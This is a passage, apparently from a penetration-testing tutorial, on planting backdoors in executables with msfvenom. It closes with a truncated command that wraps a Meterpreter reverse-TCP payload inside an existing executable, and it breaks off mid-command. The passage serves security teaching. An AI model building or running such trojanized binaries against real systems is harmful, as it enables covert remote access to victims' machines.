Backdooring is a method of bypassing normal security validation and maintaining persistent access to the system. The weakest link in any cyber espionage is the human factor. Attackers would typically use the latest known or unknown exploit to embed them into the trusted executable and distribute. In this section, we will deep dive into how you can leverage msfvenom to plant a backdoor in any executable.
Msfvenom is a standalone payload generator using Metasploit msfpayload and msfencode. In June 8 2015, msfvenom replaced msfpayload. In order to standardize the tool and make it more efficient for the penetration testers, this tool was introduced. It is installed by default in Kali Linux, and when you type msfvenom -h in the terminal, the following usage details are displayed:

msfvenom -p windows/meterpreter/reverse_tcp -k -x original_file.exe LHOST...